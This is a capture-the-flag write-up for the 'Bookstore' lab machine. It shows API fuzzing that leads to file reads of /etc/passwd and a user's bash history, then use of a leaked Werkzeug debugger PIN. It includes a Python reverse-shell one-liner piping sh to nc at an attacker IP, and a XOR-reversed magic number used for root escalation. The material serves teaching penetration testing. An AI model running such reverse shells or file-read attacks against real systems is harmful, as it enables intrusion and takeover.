Bookstore is a boot2root CTF machine that teaches a beginner penetration tester basic web enumeration and REST API Fuzzing. Several hints can be found when enumerating the services, the idea is to understand how a vulnerable API can be exploited, you can contact me on twitter @sidchn_20 for giving any feedback regarding the machine.

# Tasks
1. user flag
2. Root flag

# NMAP SCAN
```nmap
PORT     STATE SERVICE VERSION  
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA)  
|   256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA)  
|_  256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519)  
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))  
|_http-title: Book Store  
|_http-server-header: Apache/2.4.29 (Ubuntu)  
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 3.6.9)  
| http-robots.txt: 1 disallowed entry    
|_/api </p>    
|_http-title: Home  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Findings
## Web (Port 80)
- No robots.txt
- `/login.html` but no credentials.Interesting comment found
`<!--Still Working on this page will add the backend support soon, also the debugger pin is inside sid's bash history file -->`

## Web (Port 5000)
- API
- API is documented
```txt
/api/v2/resources/books/all (Retrieve all books and get the output in a json format)

/api/v2/resources/books/random4 (Retrieve 4 random records)

/api/v2/resources/books?id=1(Search by a specific parameter , id parameter)

/api/v2/resources/books?author=J.K. Rowling (Search by a specific parameter, this query will return all the books with author=J.K. Rowling)

/api/v2/resources/books?published=1993 (This query will return all the books published in the year 1993)

/api/v2/resources/books?author=J.K. Rowling&published=2003 (Search by a combination of 2 or more parameters)
```
- If there is a v2, maybe it has a v1?
`http://10.10.51.240:5000/api/v1/resources/books?id=1`
- We get a valid response!
- Maybe we can read .bash_history?
- No luck. Maybe another parameter?
- ffuf found `show` which can be used.
- We're able to read /etc/passwd
```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sid:x:1000:1000:Sid,,,:/home/sid:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
```
- Try to read .bash_history
```bash
cd /home/sid
whoami
export WERKZEUG_DEBUG_PIN=123-321-135
echo $WERKZEUG_DEBUG_PIN
python3 /home/sid/api.py
ls
exit
```

# Foothold
- Since we have access to the console, we can perform any [commands we want to](https://book.hacktricks.xyz/pentesting/pentesting-web/werkzeug)
- We can try for a reverse shell.
```py
__import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f').read();
```
```bash
listening on [any] 9001 ...  
connect to [10.17.1.163] from (UNKNOWN) [10.10.51.240] 44516  
sh: 0: can't access tty; job control turned off
```
- We now have a shell as user `sid`

# Privilege Escalation
- Okay there is a try-harder binary, it asks for a magic number, and if it's correct it will change our permissions
```bash
What's The Magic Number?!  
/bin/bash -p  
Incorrect Try Harder
```
- I tried brute-forcing with numbers but after passing 10000, I deemed it was not effective.
- Let's send the binary to our machine and reverse engineer it.
```c
  local_18 = 0x5db3;
  puts("What\'s The Magic Number?!");
  __isoc99_scanf(&DAT_001008ee,&local_1c);
  local_14 = local_1c ^ 0x1116 ^ local_18;
  if (local_14 == 0x5dcd21f4) {
    system("/bin/bash -p");
  }
  else {
    puts("Incorrect Try Harder");
  }
```
Okay so our user input is local_1c
So we have three inputs :
1. local14 = 05dcd21f4
2. 0x116
3. local_18 = 0x5db3
And three of them are being XOR.
If we send these values to a XOR calculator, we can probably see what number it is.
`1573743953`
If we send it to the binary, we'll be escalated as root!